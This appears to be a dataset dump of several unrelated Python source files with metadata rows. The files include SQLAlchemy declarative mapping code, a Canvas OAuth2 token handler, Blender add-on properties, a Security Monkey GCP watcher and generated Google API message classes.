relation to this one, their :meth:`_orm.registry.dispose` method will
also be called, if the :paramref:`_orm.registry.dispose.cascade` flag
is set to ``True``; otherwise, an error is raised if those registries
were not already disposed.
.. versionadded:: 1.4.0b2
.. seealso::
:func:`_orm.clear_mappers`
"""
mapperlib._dispose_registries({self}, cascade=cascade)
def _dispose_manager_and_mapper(self, manager):
if "mapper" in manager.__dict__:
mapper = manager.mapper
mapper._set_dispose_flags()
class_ = manager.class_
self._dispose_cls(class_)
instrumentation._instrumentation_factory.unregister(class_)
def generate_base(
self,
mapper=None,
cls=object,
name="Base",
metaclass=DeclarativeMeta,
):
"""Generate a declarative base class.
Classes that inherit from the returned class object will be
automatically mapped using declarative mapping.
E.g.::
from sqlalchemy.orm import registry
mapper_registry = registry()
Base = mapper_registry.generate_base()
class MyClass(Base):
__tablename__ = "my_table"
id = Column(Integer, primary_key=True)
The above dynamically generated class is equivalent to the
non-dynamic example below::
from sqlalchemy.orm import registry
from sqlalchemy.orm.decl_api import DeclarativeMeta
mapper_registry = registry()
class Base(metaclass=DeclarativeMeta):
__abstract__ = True
registry = mapper_registry
metadata = mapper_registry.metadata
The :meth:`_orm.registry.generate_base` method provides the
implementation for the :func:`_orm.declarative_base` function, which
creates the :class:`_orm.registry` and base class all at once.
See the section :ref:`orm_declarative_mapping` for background and
examples.
:param mapper:
An optional callable, defaults to :func:`~sqlalchemy.orm.mapper`.
This function is used to generate new :class:`_orm.Mapper` objects.
:param cls:
Defaults to :class:`object`. A type to use as the base for the
generated declarative base class. May be a class or tuple of classes.
:param name:
Defaults to ``Base``. The display name for the generated
class. Customizing this is not required, but can improve clarity in
tracebacks and debugging.
:param metaclass:
Defaults to :class:`.DeclarativeMeta`. A metaclass or __metaclass__
compatible callable to use as the meta type of the generated
declarative base class.
.. seealso::
:ref:`orm_declarative_mapping`
:func:`_orm.declarative_base`
"""
metadata = self.metadata
bases = not isinstance(cls, tuple) and (cls,) or cls
class_dict = dict(registry=self, metadata=metadata)
if isinstance(cls, type):
class_dict["__doc__"] = cls.__doc__
if self.constructor:
class_dict["__init__"] = self.constructor
class_dict["__abstract__"] = True
if mapper:
class_dict["__mapper_cls__"] = mapper
return metaclass(name, bases, class_dict)
def mapped(self, cls):
"""Class decorator that will apply the Declarative mapping process
to a given class.
E.g.::
from sqlalchemy.orm import registry
mapper_registry = registry()
@mapper_registry.mapped
class Foo:
__tablename__ = 'some_table'
id = Column(Integer, primary_key=True)
name = Column(String)
See the section :ref:`orm_declarative_mapping` for complete
details and examples.
:param cls: class to be mapped.
:return: the class that was passed.
.. seealso::
:ref:`orm_declarative_mapping`
:meth:`_orm.registry.generate_base` - generates a base class
that will apply Declarative mapping to subclasses automatically
using a Python metaclass.
"""
_as_declarative(self, cls, cls.__dict__)
return cls
def as_declarative_base(self, **kw):
"""
Class decorator which will invoke
:meth:`_orm.registry.generate_base`
for a given base class.
E.g.::
from sqlalchemy.orm import registry
mapper_registry = registry()
@mapper_registry.as_declarative_base()
class Base(object):
@declared_attr
def __tablename__(cls):
return cls.__name__.lower()
id = Column(Integer, primary_key=True)
class MyMappedClass(Base):
# ...
All keyword arguments passed to
:meth:`_orm.registry.as_declarative_base` are passed
along to :meth:`_orm.registry.generate_base`.
"""
def decorate(cls):
kw["cls"] = cls
kw["name"] = cls.__name__
return self.generate_base(**kw)
return decorate
def map_declaratively(self, cls):
"""Map a class declaratively.
In this form of mapping, the class is scanned for mapping information,
including for columns to be associated with a table, and/or an
actual table object.
Returns the :class:`_orm.Mapper` object.
E.g.::
from sqlalchemy.orm import registry
mapper_registry = registry()
class Foo:
__tablename__ = 'some_table'
id = Column(Integer, primary_key=True)
name = Column(String)
mapper = mapper_registry.map_declaratively(Foo)
This function is more conveniently invoked indirectly via either the
:meth:`_orm.registry.mapped` class decorator or by subclassing a
declarative metaclass generated from
:meth:`_orm.registry.generate_base`.
See the section :ref:`orm_declarative_mapping` for complete
details and examples.
:param cls: class to be mapped.
:return: a :class:`_orm.Mapper` object.
.. seealso::
:ref:`orm_declarative_mapping`
:meth:`_orm.registry.mapped` - more common decorator interface
to this function.
:meth:`_orm.registry.map_imperatively`
"""
return _as_declarative(self, cls, cls.__dict__)
def map_imperatively(self, class_, local_table=None, **kw):
r"""Map a class imperatively.
In this form of mapping, the class is not scanned for any mapping
information. Instead, all mapping constructs are passed as
arguments.
This method is intended to be fully equivalent to the classic
SQLAlchemy :func:`_orm.mapper` function, except that it's in terms of
a particular registry.
E.g.::
from sqlalchemy.orm import registry
mapper_registry = registry()
my_table = Table(
"my_table",
mapper_registry.metadata,
Column('id', Integer, primary_key=True)
)
class MyClass:
pass
mapper_registry.map_imperatively(MyClass, my_table)
See the section :ref:`orm_imperative_mapping` for complete background
and usage examples.
:param class\_: The class to be mapped. Corresponds to the
:paramref:`_orm.mapper.class_` parameter.
:param local_table: the :class:`_schema.Table` or other
:class:`_sql.FromClause` object that is the subject of the mapping.
Corresponds to the
:paramref:`_orm.mapper.local_table` parameter.
:param \**kw: all other keyword arguments are passed to the
:func:`_orm.mapper` function directly.
.. seealso::
:ref:`orm_imperative_mapping`
:ref:`orm_declarative_mapping`
"""
return _mapper(self, class_, local_table, kw)
mapperlib._legacy_registry = registry()
@util.deprecated_params(
bind=(
"2.0",
"The ``bind`` argument to as_declarative is "
"deprecated and will be removed in SQLAlchemy 2.0.",
)
)
def as_declarative(**kw):
"""
Class decorator which will adapt a given class into a
:func:`_orm.declarative_base`.
This function makes use of the :meth:`_orm.registry.as_declarative_base`
method, by first creating a :class:`_orm.registry` automatically
and then invoking the decorator.
E.g.::
from sqlalchemy.orm import as_declarative
@as_declarative()
class Base(object):
@declared_attr
def __tablename__(cls):
return cls.__name__.lower()
id = Column(Integer, primary_key=True)
class MyMappedClass(Base):
# ...
.. seealso::
:meth:`_orm.registry.as_declarative_base`
"""
bind, metadata, class_registry = (
kw.pop("bind", None),
kw.pop("metadata", None),
kw.pop("class_registry", None),
)
return registry(
_bind=bind, metadata=metadata, class_registry=class_registry
).as_declarative_base(**kw)
@inspection._inspects(DeclarativeMeta)
def _inspect_decl_meta(cls):
mp = _inspect_mapped_class(cls)
if mp is None:
if _DeferredMapperConfig.has_cls(cls):
_DeferredMapperConfig.raise_unmapped_for_cls(cls)
raise orm_exc.UnmappedClassError(
cls,
msg="Class %s has a deferred mapping on it. It is not yet "
"usable as a mapped class." % orm_exc._safe_cls_name(cls),
)
return mp
| 33.435824 | 97 | 0.638267 |
198d1773cc21415f07df955ad0ea159d17bbf1e1 | 905 | py | Python | KaggleTitanic/models/model_2017_09_18_04_25_37-0.8608.py | deo1/deo1 | 36671f12269d3bd662d746e8b9f66c22255c9df7 | [
"MIT"
] | null | null | null | KaggleTitanic/models/model_2017_09_18_04_25_37-0.8608.py | deo1/deo1 | 36671f12269d3bd662d746e8b9f66c22255c9df7 | [
"MIT"
] | null | null | null | KaggleTitanic/models/model_2017_09_18_04_25_37-0.8608.py | deo1/deo1 | 36671f12269d3bd662d746e8b9f66c22255c9df7 | [
"MIT"
] | null | null | null | import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import MinMaxScaler, PolynomialFeatures
from sklearn.svm import LinearSVC
# NOTE: Make sure that the class is labeled 'class' in the data file
tpot_data = np.recfromcsv('PATH/TO/DATA/FILE', delimiter='COLUMN_SEPARATOR', dtype=np.float64)
features = np.delete(tpot_data.view(np.float64).reshape(tpot_data.size, -1), tpot_data.dtype.names.index('class'), axis=1)
training_features, testing_features, training_target, testing_target = \
train_test_split(features, tpot_data['class'], random_state=42)
exported_pipeline = make_pipeline(
MinMaxScaler(),
PolynomialFeatures(include_bias=False),
LinearSVC(C=10.0, dual=True, tol=1e-05)
)
exported_pipeline.fit(training_features, training_target)
results = exported_pipeline.predict(testing_features)
| 41.136364 | 122 | 0.80221 |
b877a97805f2f2cdc1ce21de78dd56a619e6ff06 | 615 | py | Python | blog/migrations/0012_chart.py | ndavilo/BitBlog | ec6e623b04688ec0b587f6392c4fccd09f77a481 | [
"MIT"
] | null | null | null | blog/migrations/0012_chart.py | ndavilo/BitBlog | ec6e623b04688ec0b587f6392c4fccd09f77a481 | [
"MIT"
] | null | null | null | blog/migrations/0012_chart.py | ndavilo/BitBlog | ec6e623b04688ec0b587f6392c4fccd09f77a481 | [
"MIT"
] | null | null | null | # Generated by Django 4.0 on 2022-02-04 11:39
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0011_comment'),
]
operations = [
migrations.CreateModel(
name='Chart',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('value', models.FloatField()),
('date_time', models.DateTimeField(auto_now=True)),
],
),
]
| 26.73913 | 117 | 0.560976 |
021c1ff92a1f96840957ba28f0ea9b29f07ba938 | 6,193 | py | Python | canvas_oauth/oauth.py | suchermon/django-canvas-oauth2 | a1dcb3fee7681c7c0a892a999f7dbc56acebaeb1 | [
"MIT"
] | null | null | null | canvas_oauth/oauth.py | suchermon/django-canvas-oauth2 | a1dcb3fee7681c7c0a892a999f7dbc56acebaeb1 | [
"MIT"
] | null | null | null | canvas_oauth/oauth.py | suchermon/django-canvas-oauth2 | a1dcb3fee7681c7c0a892a999f7dbc56acebaeb1 | [
"MIT"
] | null | null | null | import logging
from django.urls import reverse
from django.http.response import HttpResponse, HttpResponseRedirect
from django.shortcuts import redirect
from django.template import loader
from django.template.exceptions import TemplateDoesNotExist
from django.utils.crypto import get_random_string
from canvas_oauth import (canvas, settings)
from canvas_oauth.models import CanvasOAuth2Token
from canvas_oauth.exceptions import (
MissingTokenError, InvalidOAuthStateError)
logger = logging.getLogger(__name__)
def get_oauth_token(request):
"""Retrieve a stored Canvas OAuth2 access token from Canvas for the
currently logged in user. If the token has expired (or has exceeded an
expiration threshold as defined by the consuming project), a fresh token
is generated via the saved refresh token.
If the user does not have a stored token, the method raises a
MissingTokenError exception. If this happens inside a view, this exception
will be handled by the middleware component of this library with a call to
handle_missing_token. If this happens outside of a view, then the user must
be directed by other means to the Canvas site in order to authorize a token.
"""
try:
oauth_token = request.user.canvas_oauth2_token
logger.info("Token found for user %s" % request.user.pk)
except CanvasOAuth2Token.DoesNotExist:
""" If this exception is raised by a view function and not caught,
it is probably because the oauth_middleware is not installed, since it
is supposed to catch this error."""
logger.info("No token found for user %s" % request.user.pk)
raise MissingTokenError("No token found for user %s" % request.user.pk)
# Check to see if we're within the expiration threshold of the access token
if oauth_token.expires_within(settings.CANVAS_OAUTH_TOKEN_EXPIRATION_BUFFER):
logger.info("Refreshing token for user %s" % request.user.pk)
oauth_token = refresh_oauth_token(request)
return oauth_token.access_token
def handle_missing_token(request):
"""
Redirect user to canvas with a request for token.
"""
# Store where the user came from so they can be redirected back there
# at the end. https://canvas.instructure.com/doc/api/file.oauth.html
request.session["canvas_oauth_initial_uri"] = request.get_full_path()
# The request state is a recommended security check on the callback, so
# store in session for later
oauth_request_state = get_random_string()
request.session["canvas_oauth_request_state"] = oauth_request_state
# The return URI is required to be the same when POSTing to generate
# a token on callback, so also store it in session (although it could
# be regenerated again via the same method call).
oauth_redirect_uri = request.build_absolute_uri(reverse('canvas-oauth-callback'))
request.session["canvas_oauth_redirect_uri"] = oauth_redirect_uri
authorize_url = canvas.get_oauth_login_url(
settings.CANVAS_OAUTH_CLIENT_ID,
redirect_uri=oauth_redirect_uri,
state=oauth_request_state,
scopes=settings.CANVAS_OAUTH_SCOPES
)
logger.info("Redirecting user to %s" % authorize_url)
return HttpResponseRedirect(authorize_url)
def oauth_callback(request):
""" Receives the callback from canvas and saves the token to the database.
Redirects user to the page they came from at the start of the oauth
procedure. """
error = request.GET.get('error')
error_description = request.GET.get('error_description')
if error:
return render_oauth_error(error, error_description)
code = request.GET.get('code')
state = request.GET.get('state')
if state != request.session['canvas_oauth_request_state']:
logger.warning("OAuth state mismatch for request: %s" % request.get_full_path())
raise InvalidOAuthStateError("OAuth state mismatch!")
# Make the `authorization_code` grant type request to retrieve a
access_token, expires, refresh_token = canvas.get_access_token(
grant_type='authorization_code',
client_id=settings.CANVAS_OAUTH_CLIENT_ID,
client_secret=settings.CANVAS_OAUTH_CLIENT_SECRET,
redirect_uri=request.session["canvas_oauth_redirect_uri"],
code=code)
obj = CanvasOAuth2Token.objects.create(
user=request.user,
access_token=access_token,
expires=expires,
refresh_token=refresh_token)
logger.info("CanvasOAuth2Token instance created: %s" % obj.pk)
initial_uri = request.session['canvas_oauth_initial_uri']
logger.info("Redirecting user back to initial uri %s" % initial_uri)
return redirect(initial_uri)
def refresh_oauth_token(request):
""" Makes refresh_token grant request with Canvas to get a fresh
access token. Update the oauth token model with the new token
and new expiration date and return the saved model.
"""
oauth_token = request.user.canvas_oauth2_token
# Get the new access token and expiration date via
# a refresh token grant
oauth_token.access_token, oauth_token.expires, _ = canvas.get_access_token(
grant_type='refresh_token',
client_id=settings.CANVAS_OAUTH_CLIENT_ID,
client_secret=settings.CANVAS_OAUTH_CLIENT_SECRET,
redirect_uri=request.build_absolute_uri(
reverse('canvas-oauth-callback')),
refresh_token=oauth_token.refresh_token)
# Update the model with new token and expiration
oauth_token.save()
return oauth_token
def render_oauth_error(error, message):
""" If there is an error in the oauth callback, attempts to render it in a
template that can be styled; otherwise, if OAUTH_ERROR_TEMPLATE not
found, this will return a HttpResponse with status 403 """
logger.error("OAuth error %s" % error)
try:
template = loader.render_to_string(
settings.CANVAS_OAUTH_ERROR_TEMPLATE,
{'error': error, 'message': message}
)
except TemplateDoesNotExist:
return HttpResponse("Error: %s" % error, status=403)
return HttpResponse(template, status=403)
| 41.286667 | 88 | 0.731955 |
00478460107fcadc81f1721c53e7f4ecedc617cd | 107 | py | Python | nrgmodbus/ipackaccess/__init__.py | nrgpy/nrgmodbus | 8932c527c30113933bba71c2f0f99e81966865ad | [
"MIT"
] | null | null | null | nrgmodbus/ipackaccess/__init__.py | nrgpy/nrgmodbus | 8932c527c30113933bba71c2f0f99e81966865ad | [
"MIT"
] | null | null | null | nrgmodbus/ipackaccess/__init__.py | nrgpy/nrgmodbus | 8932c527c30113933bba71c2f0f99e81966865ad | [
"MIT"
] | null | null | null | __name__ = "ipackaccess"
from .ipackaccess import ipackaccess
from .registers import ipackaccess_registers
| 26.75 | 44 | 0.850467 |
680892e5b3364903267316816aa253b6292a7efe | 6,979 | py | Python | src/properties.py | mika-f/Blender-TextMeshCreator | 19367cc8f711518b9fb3df8cc19735a52458a465 | [
"BlueOak-1.0.0",
"Apache-2.0",
"MIT"
] | null | null | null | src/properties.py | mika-f/Blender-TextMeshCreator | 19367cc8f711518b9fb3df8cc19735a52458a465 | [
"BlueOak-1.0.0",
"Apache-2.0",
"MIT"
] | null | null | null | src/properties.py | mika-f/Blender-TextMeshCreator | 19367cc8f711518b9fb3df8cc19735a52458a465 | [
"BlueOak-1.0.0",
"Apache-2.0",
"MIT"
] | null | null | null | # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# Copyright (c) Natsuneko. All rights reserved.
# Licensed under the License Zero Parity 7.0.0 (see LICENSE-PARITY file) and MIT (contributions, see LICENSE-MIT file) with exception License Zero Patron 1.0.0 (see LICENSE-PATRON file)
# -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
from bpy.props import BoolProperty, EnumProperty, FloatProperty, IntProperty, StringProperty
from bpy.types import PropertyGroup
class TextMeshCreatorProperties(PropertyGroup):
def separator_items(self, context):
return [
("SPACE", "Space", "Separate Strings by Space"),
("TAB", "Tab", "Separate Strings by Tab"),
("CHARACTER", "Character", "Separate Strings by Character"),
("NONE", "None", "Do not separate"),
]
def align_x(self, context):
return [
("LEFT", "Left", "Align text to the left"),
("CENTER", "Center", "Center text"),
("RIGHT", "Right", "Align text to the right"),
("JUSTIFY", "Justify", " Align to the left and the right"),
("FLUSH", "Flush", "Align to the left and the right, with equal character spacing")
]
def align_y(self, context):
return [
("TOP_BASELINE", "Top Baseline", "Align to top but use the base-line of the text"),
("TOP", "Top", "Align text to the top"),
("CENTER", "Center", "Align text to the middle"),
("BOTTOM", "Bottom", "Align text to the bottom"),
("BOTTOM_BASELINE", "Bottom Baseline", "Align text to the bottom but use the base-line of the text"),
]
# generic
strings: StringProperty(default="", name="Strings", description="Strings to be generated", options={"HIDDEN"})
rotation_x: FloatProperty(default=90.0, name="Rotation X", description="Rotation X for Text", options={"HIDDEN"})
rotation_y: FloatProperty(default=0.0, name="Rotation Y", description="Rotation Y for Text", options={"HIDDEN"})
rotation_z: FloatProperty(default=180.0, name="Rotation Z", description="Rotation Z for Text", options={"HIDDEN"})
scale_x: FloatProperty(default=1.0, name="Scale X", description="Scales X for Text", options={"HIDDEN"})
scale_y: FloatProperty(default=1.0, name="Scale Y", description="Scales Y for Text", options={"HIDDEN"})
scale_z: FloatProperty(default=1.0, name="Scale Z", description="Scales Z for Text", options={"HIDDEN"})
font_path: StringProperty(default="", name="Font", description="Font used for mesh generation",
subtype="FILE_PATH", options={"HIDDEN"})
separate_by: EnumProperty(default=3, items=separator_items, name="Separate By",
description="How to separate strings", options={"HIDDEN"})
# text layout
size: FloatProperty(default=1.0, name="Size", description="Font Size of mesh to be generated", options={"HIDDEN"})
thickness: FloatProperty(default=0.1, name="Thickness",
description="Thickness of mesh to be generated", options={"HIDDEN"})
horizontal_alignment: EnumProperty(default=0, items=align_x, name="Horizontal Alignment",
description="Horizontal Alignment for Paragraph", options={"HIDDEN"})
vertical_alignment: EnumProperty(default=0, items=align_y, name="Vertical Alignment",
description="Vertical Alignment for Paragraph", options={"HIDDEN"})
character_spacing: FloatProperty(default=1.2, name="Character Spacing",
description="Spaces between characters (ignored for separated by character)", options={"HIDDEN"})
word_spacing: FloatProperty(default=0.2, name="Word Spacing",
description="Space between words (ignored for separated by character or tab)", options={"HIDDEN"})
# blendshape
use_blendshape: BoolProperty(default=False, name="Use Blendshape",
description="Move characters with Blendshapes", options={"HIDDEN"})
blendshape_min_x: FloatProperty(default=0.0, name="Blendshape Move Min X",
description="Blendshape offsets for moving to X", options={"HIDDEN"})
blendshape_max_x: FloatProperty(default=0.0, name="Blendshape Move Max X",
description="Blendshape offsets for moving to X", options={"HIDDEN"})
blendshape_min_y: FloatProperty(default=0.0, name="Blendshape Move Min Y",
description="Blendshape offsets for moving to Y", options={"HIDDEN"})
blendshape_max_y: FloatProperty(default=0.0, name="Blendshape Move Max Y",
description="Blendshape offsets for moving to Y", options={"HIDDEN"})
blendshape_min_z: FloatProperty(default=0.0, name="Blendshape Move Min Z",
description="Blendshape offsets for moving to Z", options={"HIDDEN"})
blendshape_max_z: FloatProperty(default=0.0, name="Blendshape Move Max Z",
description="Blendshape offsets for moving to Z", options={"HIDDEN"})
# mesh
use_decimate: BoolProperty(default=False, name="Use Decimate",
description="Set to True if using mesh decimate", options={"HIDDEN"})
decimate_ratio: FloatProperty(default=0.5, name="Decimate Ratio", description="Decimate Ratio", options={"HIDDEN"})
separate_by_loose_parts: BoolProperty(default=True, name="Separate by Loose Parts",
description="Separate character by loose parts", options={"HIDDEN"})
center_to_origin: BoolProperty(default=False, name="Center to Origin",
description="Set to True if want to center of the text to be the origin", options={"HIDDEN"})
# export
is_preview: BoolProperty(default=False, name="Enable Preview Mode",
description="Set to True if want to check the generation result according to the set value", options={"HIDDEN"})
inline_fbx: BoolProperty(default=False, name="Export as inline FBX",
description="Set to True if export multiple separated character(s) as single FBX", options={"HIDDEN"})
increment_from: IntProperty(default=0, name="Increment From",
description="Offset value of serial number for output file", options={"HIDDEN"})
export_path: StringProperty(default="", name="Export Directory",
description="Export FBX to", subtype="DIR_PATH", options={"HIDDEN"})
| 71.214286 | 187 | 0.598796 |
9b83704ac17319fad3e4871cbf37f1c3d55c7684 | 3,679 | py | Python | security_monkey/watchers/gcp/iam/serviceaccount.py | bungoume/security_monkey | 90c02638a315c78535869ab71a8859d17e011a6a | [
"Apache-2.0"
] | null | null | null | security_monkey/watchers/gcp/iam/serviceaccount.py | bungoume/security_monkey | 90c02638a315c78535869ab71a8859d17e011a6a | [
"Apache-2.0"
] | null | null | null | security_monkey/watchers/gcp/iam/serviceaccount.py | bungoume/security_monkey | 90c02638a315c78535869ab71a8859d17e011a6a | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. module: security_monkey.watchers.gcp.iam.serviceaccount
:platform: Unix
.. version:: $$VERSION$$
.. moduleauthor:: Tom Melendez <supertom@google.com> @supertom
"""
from security_monkey.common.gcp.util import get_gcp_project_creds, get_user_agent, gcp_resource_id_builder
from security_monkey.watcher import Watcher
from security_monkey.watcher import ChangeItem
from cloudaux.gcp.decorators import iter_project
from cloudaux.gcp.iam import list_serviceaccounts
from cloudaux.orchestration.gcp.iam.serviceaccount import get_serviceaccount_complete
class IAMServiceAccount(Watcher):
index = 'iamserviceaccount'
i_am_singular = 'IAMServiceAccount'
i_am_plural = 'IAMServiceAccounts'
account_type = 'GCP'
def __init__(self, accounts=None, debug=False):
super(IAMServiceAccount, self).__init__(accounts=accounts, debug=debug)
self.honor_ephemerals = True
self.ephemeral_paths = [
"Etag",
]
self.user_agent = get_user_agent()
def slurp(self):
"""
:returns: item_list - list of IAMServiceAccounts.
:returns: exception _map - A dict where the keys are a tuple containing the
location of the exception and the value is the actual exception
"""
self.prep_for_slurp()
project_creds = get_gcp_project_creds(self.accounts)
@iter_project(projects=project_creds)
def slurp_items(**kwargs):
item_list = []
kwargs['user_agent'] = self.user_agent
service_accounts = list_serviceaccounts(**kwargs)
for service_account in service_accounts:
resource_id = gcp_resource_id_builder(
'projects.serviceaccounts.get', service_account['name'])
sa = get_serviceaccount_complete(
service_account=service_account['name'], **kwargs)
key_count = 0
if 'Keys' in sa:
key_count = len(sa['Keys'])
item_list.append(
IAMServiceAccountItem(
region='global',
account=sa['ProjectId'],
name=sa['DisplayName'],
arn=resource_id,
config={
'policy': sa.get('Policy', None),
'email': sa['Email'],
'keys': key_count,
}))
return item_list, kwargs.get('exception_map', {})
return slurp_items()
class IAMServiceAccountItem(ChangeItem):
def __init__(self,
region=None,
account=None,
name=None,
arn=None,
config=None):
if config is None:
config = {}
super(IAMServiceAccountItem, self).__init__(
index=IAMServiceAccount.index,
region=region,
account=account,
name=name,
arn=arn,
new_config=config)
| 35.375 | 106 | 0.604784 |
f91da3958072fff255b3d83b8ec747d845cc01c3 | 62,109 | py | Python | lib/googlecloudsdk/third_party/apis/runapps/v1alpha1/runapps_v1alpha1_messages.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | 2 | 2019-11-10T09:17:07.000Z | 2019-12-18T13:44:08.000Z | lib/googlecloudsdk/third_party/apis/runapps/v1alpha1/runapps_v1alpha1_messages.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | null | null | null | lib/googlecloudsdk/third_party/apis/runapps/v1alpha1/runapps_v1alpha1_messages.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | 1 | 2020-07-25T01:40:19.000Z | 2020-07-25T01:40:19.000Z | """Generated message classes for runapps version v1alpha1.
"""
# NOTE: This file is autogenerated and should not be edited by hand.
from __future__ import absolute_import
from apitools.base.protorpclite import messages as _messages
from apitools.base.py import encoding
from apitools.base.py import extra_types
package = 'runapps'
class Application(_messages.Message):
r"""Message describing Application object Next tag: 8
Messages:
AnnotationsValue: Unstructured key value map that may be set by external
tools to store and arbitrary metadata. They are not queryable and should
be preserved when modifying objects. This field follows Kubernetes
annotations' namespacing, limits, and rules. More info:
http://kubernetes.io/docs/user-guide/annotations
LabelsValue: Labels as key value pairs
Fields:
annotations: Unstructured key value map that may be set by external tools
to store and arbitrary metadata. They are not queryable and should be
preserved when modifying objects. This field follows Kubernetes
annotations' namespacing, limits, and rules. More info:
http://kubernetes.io/docs/user-guide/annotations
config: The application configuration. On output, both intent repo and
application config are populated. On input, only one can be modified at
a time.
createTime: Output only. Create time stamp
deleteTime: Output only. For a deleted resource, the deletion time. It is
only populated as a response to a Delete request.
etag: Output only. A system-generated fingerprint for this version of the
resource. May be used to detect modification conflict during updates.
labels: Labels as key value pairs
name: name of resource
reconciling: Output only. Indicates whether the resource's reconciliation
is still in progress.
updateTime: Output only. Update time stamp
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class AnnotationsValue(_messages.Message):
r"""Unstructured key value map that may be set by external tools to store
and arbitrary metadata. They are not queryable and should be preserved
when modifying objects. This field follows Kubernetes annotations'
namespacing, limits, and rules. More info: http://kubernetes.io/docs/user-
guide/annotations
Messages:
AdditionalProperty: An additional property for a AnnotationsValue
object.
Fields:
additionalProperties: Additional properties of type AnnotationsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a AnnotationsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
@encoding.MapUnrecognizedFields('additionalProperties')
class LabelsValue(_messages.Message):
r"""Labels as key value pairs
Messages:
AdditionalProperty: An additional property for a LabelsValue object.
Fields:
additionalProperties: Additional properties of type LabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a LabelsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
annotations = _messages.MessageField('AnnotationsValue', 1)
config = _messages.MessageField('Config', 2)
createTime = _messages.StringField(3)
deleteTime = _messages.StringField(4)
etag = _messages.StringField(5)
labels = _messages.MessageField('LabelsValue', 6)
name = _messages.StringField(7)
reconciling = _messages.BooleanField(8)
updateTime = _messages.StringField(9)
class ApplicationStatus(_messages.Message):
r"""Status of the application.
Fields:
modifyTime: Time at which the status was last updated.
name: The resource name of the application status, in the following form:
`projects/{project}/locations/{location}/applications/{name}/status`
resource: Repeated field with status per resource.
"""
modifyTime = _messages.StringField(1)
name = _messages.StringField(2)
resource = _messages.MessageField('ResourceStatus', 3, repeated=True)
class Binding(_messages.Message):
r"""Associates `members`, or principals, with a `role`.
Fields:
condition: The condition that is associated with this binding. If the
condition evaluates to `true`, then this binding applies to the current
request. If the condition evaluates to `false`, then this binding does
not apply to the current request. However, a different role binding
might grant the same role to one or more of the principals in this
binding. To learn which resources support conditions in their IAM
policies, see the [IAM
documentation](https://cloud.google.com/iam/help/conditions/resource-
policies).
members: Specifies the principals requesting access for a Cloud Platform
resource. `members` can have the following values: * `allUsers`: A
special identifier that represents anyone who is on the internet; with
or without a Google account. * `allAuthenticatedUsers`: A special
identifier that represents anyone who is authenticated with a Google
account or a service account. * `user:{emailid}`: An email address that
represents a specific Google account. For example, `alice@example.com` .
* `serviceAccount:{emailid}`: An email address that represents a service
account. For example, `my-other-app@appspot.gserviceaccount.com`. *
`group:{emailid}`: An email address that represents a Google group. For
example, `admins@example.com`. *
`deleted:user:{emailid}?uid={uniqueid}`: An email address (plus unique
identifier) representing a user that has been recently deleted. For
example, `alice@example.com?uid=123456789012345678901`. If the user is
recovered, this value reverts to `user:{emailid}` and the recovered user
retains the role in the binding. *
`deleted:serviceAccount:{emailid}?uid={uniqueid}`: An email address
(plus unique identifier) representing a service account that has been
recently deleted. For example, `my-other-
app@appspot.gserviceaccount.com?uid=123456789012345678901`. If the
service account is undeleted, this value reverts to
`serviceAccount:{emailid}` and the undeleted service account retains the
role in the binding. * `deleted:group:{emailid}?uid={uniqueid}`: An
email address (plus unique identifier) representing a Google group that
has been recently deleted. For example,
`admins@example.com?uid=123456789012345678901`. If the group is
recovered, this value reverts to `group:{emailid}` and the recovered
group retains the role in the binding. * `domain:{domain}`: The G Suite
domain (primary) that represents all the users of that domain. For
example, `google.com` or `example.com`.
role: Role that is assigned to the list of `members`, or principals. For
example, `roles/viewer`, `roles/editor`, or `roles/owner`.
"""
condition = _messages.MessageField('Expr', 1)
members = _messages.StringField(2, repeated=True)
role = _messages.StringField(3)
class CancelOperationRequest(_messages.Message):
r"""The request message for Operations.CancelOperation."""
class CloudRunServiceConfig(_messages.Message):
r"""Message for Cloud Run service configs.
Fields:
image: The container image to deploy the service with.
resources: Bindings to other resources.
"""
image = _messages.StringField(1)
resources = _messages.MessageField('ServiceResourceBindingConfig', 2, repeated=True)
class CloudSqlConfig(_messages.Message):
r"""Message for a Cloud SQL resource.
Fields:
settings: Settings for the Cloud SQL instance.
version: The database version. e.g. "MYSQL_8_0". The version must match
one of the values at https://cloud.google.com/sql/docs/mysql/admin-
api/rest/v1beta4/SqlDatabaseVersion.
"""
settings = _messages.MessageField('CloudSqlSettings', 1)
version = _messages.StringField(2)
class CloudSqlSettings(_messages.Message):
r"""Message for settings for a CloudSql instance.
Fields:
activation_policy: The activation policy of the Cloud SQL instance. e.g.
"ALWAYS".
availability_type: The availability type of the Cloud SQL instance. e.g.
"REGIONAL".
disk_size: The disk size of the Cloud SQL instance, in GB. This value
cannot be decreased on Update.
disk_type: The type of disk for the Cloud SQL instance. e.g. "PD_SSD".
tier: Tier of the Cloud SQL instance. e.g. "db-f1-micro".
"""
activation_policy = _messages.StringField(1)
